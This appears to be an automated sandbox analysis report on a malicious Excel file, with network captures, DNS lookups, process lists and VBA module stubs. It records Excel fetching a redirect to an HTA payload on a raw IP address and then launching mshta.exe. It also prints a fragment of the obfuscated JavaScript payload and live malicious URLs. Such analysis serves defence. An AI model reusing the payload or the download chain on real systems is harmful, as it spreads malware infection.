          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
          TimestampSource PortDest PortSource IPDest IP
          Dec 16, 2024 17:12:17.691850901 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:17.691888094 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:17.691967964 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:17.692922115 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:17.692934036 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:19.129498959 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:19.129576921 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:19.131371975 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:19.131377935 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:19.132586002 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:19.132648945 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:19.133929014 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:19.134005070 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:19.134067059 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:19.134073973 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:19.134119034 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:19.135674953 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:19.179335117 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:20.420603037 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:20.420670986 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:20.420706034 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:20.420751095 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:20.421840906 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:20.421888113 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:20.421919107 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:20.421964884 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:20.424793959 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:20.424814939 CET44349699170.82.174.30192.168.2.26
          Dec 16, 2024 17:12:20.424829006 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:20.424868107 CET49699443192.168.2.26170.82.174.30
          Dec 16, 2024 17:12:20.426896095 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:20.546739101 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:20.546842098 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:20.547136068 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:20.938735962 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.685353041 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.685566902 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.685766935 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.685805082 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.685825109 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.685859919 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.686525106 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.686561108 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.686584949 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.686619043 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.687659025 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.687747955 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.687820911 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.687876940 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.688889027 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.688925028 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.688965082 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.688992023 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.690375090 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.690445900 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.806870937 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.806935072 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.807885885 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.807934999 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:21.811484098 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:21.811640024 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.001801968 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.001838923 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.322999954 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.323065996 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.324414015 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.324431896 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.324465990 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.324491978 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.325843096 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.325860023 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.325895071 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.325906992 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.327263117 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.327280045 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.327296019 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.327332020 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.327358007 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.328675985 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.328695059 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.328727961 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.328746080 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.330296040 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.330316067 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.330347061 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.330368996 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.331736088 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.331754923 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.331800938 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.333019972 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.333038092 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.333054066 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.333081007 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.333117962 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.335942030 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.336051941 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.338799000 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.338886976 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.341624022 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.341703892 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.343138933 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.343218088 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.345948935 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.345968008 CET8049704172.245.123.12192.168.2.26
          Dec 16, 2024 17:12:22.346000910 CET4970480192.168.2.26172.245.123.12
          Dec 16, 2024 17:12:22.346029997 CET4970480192.168.2.26172.245.123.12
          TimestampSource PortDest PortSource IPDest IP
          Dec 16, 2024 17:12:17.546627998 CET5884153192.168.2.261.1.1.1
          Dec 16, 2024 17:12:17.691092014 CET53588411.1.1.1192.168.2.26
          Dec 16, 2024 17:12:45.861603975 CET5884153192.168.2.261.1.1.1
          Dec 16, 2024 17:13:28.227938890 CET5884153192.168.2.261.1.1.1
          Dec 16, 2024 17:13:28.237406015 CET5317453192.168.2.261.1.1.1
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 16, 2024 17:12:17.546627998 CET192.168.2.261.1.1.10x3b59Standard query (0)curt.wiz.coA (IP address)IN (0x0001)false
          Dec 16, 2024 17:12:45.861603975 CET192.168.2.261.1.1.10xe097Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
          Dec 16, 2024 17:13:28.227938890 CET192.168.2.261.1.1.10xefc2Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
          Dec 16, 2024 17:13:28.237406015 CET192.168.2.261.1.1.10xc57dStandard query (0)ecn.dev.virtualearth.netA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 16, 2024 17:12:17.691092014 CET1.1.1.1192.168.2.260x3b59No error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
          Dec 16, 2024 17:12:17.691092014 CET1.1.1.1192.168.2.260x3b59No error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
          Dec 16, 2024 17:12:17.691092014 CET1.1.1.1192.168.2.260x3b59No error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
          Dec 16, 2024 17:12:45.999953985 CET1.1.1.1192.168.2.260xe097No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
          Dec 16, 2024 17:13:28.365889072 CET1.1.1.1192.168.2.260xefc2No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
          Dec 16, 2024 17:13:28.375741959 CET1.1.1.1192.168.2.260xc57dNo error (0)ecn.dev.virtualearth.netssl2.tiles.virtualearth.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
          • curt.wiz.co
          • 172.245.123.12
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.2649704172.245.123.12807688C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          TimestampBytes transferredDirectionData
          Dec 16, 2024 17:12:20.547136068 CET276OUTGET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Connection: Keep-Alive
          Host: 172.245.123.12
          Dec 16, 2024 17:12:21.685353041 CET1236INHTTP/1.1 200 OK
          Date: Mon, 16 Dec 2024 16:12:21 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
          Last-Modified: Mon, 16 Dec 2024 08:16:25 GMT
          ETag: "241db-6295ecbefb4bc"
          Accept-Ranges: bytes
          Content-Length: 147931
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/hta
          Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
          Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%
          Dec 16, 2024 17:12:21.685766935 CET1236INData Raw: 33 30 25 32 35 25 33 33 25 33 32 25 32 35 25 33 33 25 33 36 25 32 35 25 33 33 25 33 37 25 32 35 25 33 33 25 33 37 25 32 35 25 33 33 25 33 39 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36
          Data Ascii: 30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%
          Dec 16, 2024 17:12:21.685805082 CET448INData Raw: 32 35 25 33 34 25 33 39 25 32 35 25 33 36 25 36 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 32 25 33 38 25 32 35 25 33 36 25 36 32 25 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 33 33 25 32 35 25 33 36 25 33 38 25 32 35 25 33 36 25 33 31 25 32
          Data Ascii: 25%34%39%25%36%65%25%37%34%25%32%38%25%36%62%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%35%25%36%62%25%32%65%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%39%25%32%39%25%35%65%25%37%33%
          Dec 16, 2024 17:12:21.686525106 CET1236INData Raw: 34 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 37 25 33 32 25 32 35 25 33 36 25 33 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 37 25 33 35 25 32 35 25 33 37 25 33 32 25 32 35 25 33 36 25 36 35 25 32 35 25 33 32 25 33 30
          Data Ascii: 4%25%30%61%25%30%39%25%37%32%25%36%35%25%37%34%25%37%35%25%37%32%25%36%65%25%32%30%25%37%32%25%33%62%25%30%61%25%37%64%25%30%61%27%29%29%3B%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%2
          Dec 16, 2024 17:12:21.686561108 CET1236INData Raw: 31 25 33 33 25 32 35 25 33 34 25 33 31 25 32 35 25 33 36 25 33 32 25 32 35 25 33 37 25 33 37 25 32 35 25 33 36 25 33 34 25 32 35 25 33 38 25 33 37 25 32 35 25 33 34 25 33 32 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 36 25 32 35 25 33 34
          Data Ascii: 1%33%25%34%31%25%36%32%25%37%37%25%36%34%25%38%37%25%34%32%25%31%34%25%31%36%25%34%34%25%35%39%25%36%62%25%35%66%25%37%30%25%35%64%25%37%34%25%32%38%25%35%63%25%36%66%25%35%32%25%36%65%25%37%39%25%34%39%25%34%64%25%36%64%25%34%30%25%32%62%25%3
          Dec 16, 2024 17:12:21.687659025 CET1236INData Raw: 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31
          Data Ascii: 0%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%3
          Dec 16, 2024 17:12:21.687820911 CET1236INData Raw: 35 25 33 36 25 33 38 25 32 35 25 33 35 25 33 38 25 32 35 25 33 38 25 36 31 25 32 35 25 33 34 25 36 32 25 32 35 25 33 35 25 36 36 25 32 35 25 33 35 25 36 31 25 32 35 25 33 37 25 33 30 25 32 35 25 33 35 25 36 36 25 32 35 25 33 37 25 36 34 25 32 35
          Data Ascii: 5%36%38%25%35%38%25%38%61%25%34%62%25%35%66%25%35%61%25%37%30%25%35%66%25%37%64%25%38%32%25%37%61%25%37%34%25%36%66%25%38%39%25%37%61%25%37%39%25%35%36%25%35%34%25%36%62%25%35%36%25%34%39%25%36%63%25%35%37%25%37%65%25%35%65%25%35%30%25%37%35%2
          Dec 16, 2024 17:12:21.688889027 CET1236INData Raw: 37 25 33 36 25 32 35 25 33 35 25 36 33 25 32 35 25 33 37 25 36 32 25 32 35 25 33 36 25 33 39 25 32 35 25 33 37 25 33 37 25 32 35 25 33 37 25 36 31 25 32 35 25 33 34 25 33 32 25 32 35 25 33 34 25 36 32 25 32 35 25 33 35 25 33 35 25 32 35 25 33 37
          Data Ascii: 7%36%25%35%63%25%37%62%25%36%39%25%37%37%25%37%61%25%34%32%25%34%62%25%35%35%25%37%63%25%34%65%25%34%66%25%36%34%25%35%66%25%35%38%25%35%36%25%38%34%25%34%62%25%35%31%25%37%65%25%35%30%25%37%65%25%37%37%25%37%64%25%35%30%25%36%34%25%35%66%25%3
          Dec 16, 2024 17:12:21.688925028 CET1236INData Raw: 31 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34
          Data Ascii: 1%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%3
          Dec 16, 2024 17:12:21.690375090 CET1236INData Raw: 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35
          Data Ascii: 5%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%33%31%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%2
          Dec 16, 2024 17:12:21.806870937 CET1236INData Raw: 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31
          Data Ascii: 1%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%3


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.2649699170.82.174.304437688C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          TimestampBytes transferredDirectionData
          2024-12-16 16:12:19 UTC244OUTGET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Host: curt.wiz.co
          Connection: Keep-Alive
          2024-12-16 16:12:20 UTC983INHTTP/1.1 302 Found
          Date: Mon, 16 Dec 2024 16:12:20 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 108
          Connection: close
          Set-Cookie: sess=123; path=/; Secure; HttpOnly
          Location: http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
          Strict-Transport-Security: max-age=31536000; includeSubDomains
          x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
          X-DNS-Prefetch-Control: off
          X-Frame-Options: SAMEORIGIN
          X-Download-Options: noopen
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
          Referrer-Policy: strict-origin
          Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
          X-GoCache-CacheStatus: BYPASS
          2024-12-16 16:12:20 UTC108INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 32 2f 32 33 33 2f 65 65 63 2f 63 72 65 61 74 65 64 62 65 74 74 65 72 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 6e 72 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 77 69 74 68 6e 69 63 65 2e 68 74 61
          Data Ascii: Found. Redirecting to http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:11:11:23
          Start date:16/12/2024
          Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
          Imagebase:0x7ff779ae0000
          File size:70'082'712 bytes
          MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:4
          Start time:11:12:04
          Start date:16/12/2024
          Path:C:\Windows\System32\appidpolicyconverter.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\appidpolicyconverter.exe"
          Imagebase:0x7ff6005b0000
          File size:155'648 bytes
          MD5 hash:6567D9CF2545FAAC60974D9D682700D4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:5
          Start time:11:12:04
          Start date:16/12/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff74b1a0000
          File size:1'040'384 bytes
          MD5 hash:9698384842DA735D80D278A427A229AB
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Target ID:15
          Start time:11:12:20
          Start date:16/12/2024
          Path:C:\Windows\System32\mshta.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\mshta.exe -Embedding
          Imagebase:0x7ff698850000
          File size:32'768 bytes
          MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:18
          Start time:11:12:28
          Start date:16/12/2024
          Path:C:\Windows\splwow64.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\splwow64.exe 12288
          Imagebase:0x7ff6e2790000
          File size:192'512 bytes
          MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:30
          Start time:11:12:54
          Start date:16/12/2024
          Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx"
          Imagebase:0x7ff779ae0000
          File size:70'082'712 bytes
          MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Call Graph

          • Entrypoint
          • Decryption Function
          • Executed
          • Not Executed
          • Show Help
          callgraph 1 Error: Graph is empty

          Module: Sheet1

          Declaration
          LineContent
          1

          Attribute VB_Name = "Sheet1"

          2

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "Sheet1"

          10

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Module: Sheet2

          Declaration
          LineContent
          1

          Attribute VB_Name = "Sheet2"

          2

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "Sheet2"

          10

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Module: ThisWorkbook

          Declaration
          LineContent
          1

          Attribute VB_Name = "ThisWorkbook"

          2

          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "ThisWorkbook"

          10

          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

          11
